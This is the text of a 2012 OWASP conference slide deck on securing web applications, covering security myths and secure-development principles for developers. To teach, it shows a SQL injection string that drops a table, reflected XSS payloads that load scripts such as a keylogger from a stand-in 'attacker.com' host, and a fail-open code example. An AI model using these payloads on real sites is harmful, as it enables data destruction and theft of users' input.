how to secure web applications
DESCRIPTION
I presented this presentation at owasp hyderabad oct 2012 meet. you can find more details at https://www.owasp.org/index.php/HyderabadTRANSCRIPT
The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards“
”- Gene Spafford
SECURING WEB APPLICATIONS
ofA BIRD'S EYE VIEW
Hello Everyone
# Security Researcher # Null Hyd Moderator # OWASP Hyd Board Member @imran_naseem
Imran Mohammed
Do you know ?
90% of companiesgot hacked last year
http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey
To name few ...
got hacked twice60%
50% are unsure about this year
Myths of App Sec
Myth #1
We have network firewall & WAF
Myth #2
We have SSL hence we are secure
Myth #3
Testing team will handle security
Myth #4
Nobody will attack us, we are a small organization
If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology“
”- Bruce Schneier
Ten commandments of secure development
Input is evil, validate it
Validate input source, context, syntax and semantics of data, current and previous states
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James
Back-end: SELECT title,year FROM books WHERE author = ‘James’
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James’; drop table books;––
Back-end: SELECT title,year FROM books WHERE author = 'James’; drop table books;–– '
Cross Site ScriptingFunctionality:
https://example.com/error.php?message=Sorry%2c+an +error+occurred
“Reflected” back to the client via webserver:
<p>Sorry, an error occurred.</p>
Any Problem ?
https://example.com/error.php?message=[can i change this ?]
Cross Site ScriptingAttack Users:
https://example.com/error.php?message=<script src=”attacker.com/malicious.js”></script>
“Reflected” back to the client via webserver: <p><script src=”attacker.com/malicious.js”></script>.</p>
More problems
https://example.com/error.php?message=
<script src=”attacker.com/keylogger.js”></script>
https://example.com/error.php?message=
<script>document.location.href=”badsite.com”</script>
POST /books/user1/search.asp HTTP/1.1
Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg, application/xshockwaveflash, application/vnd.msexcel,
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d
Host: www.example.com
q=sqli
hidden_field=20
Check this
Check this
Check this
Check this
Use cryptographically strong algorithms
Cookie: lang=english; sessionid=aW1yYW4=
Cookie: lang=english; sessionid=cmFnaHU=
Base 64 is not encryption
http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a
MD5 is not good enough
Google it
Use SHA2 or better with salt
Minimize attack surface
Use Least privilege
Keep security simple
Keep design as simple and small as possible. Complex design is difficult to understand and secure.
Provide Defense in depth
Fail safelyisAdmin = true;
try {
codeWhichMayFail();
isAdmin = isUserInRole( “Administrator” );
}
catch (Exception ex) {
log.write(ex.toString());
}
Avoid Security through obscurity
Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC
Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC
Fix Security issues correctly
Use Secure defaults
Remember scott/tiger ?
andAdmin/password ( router's admin panel )
Dont reinvent the wheeel
How to do develop/fix the code securely ?
Follow Secure SDLC
OWASP Development Guide
Educate Developers/Users
Use OWASP ESAPI
Typical OWASP ESAPI Example
Thanks !
Questions ?
CreditsAll icons are taken from the noun project
OWASP Project related Images are taken from owasp.org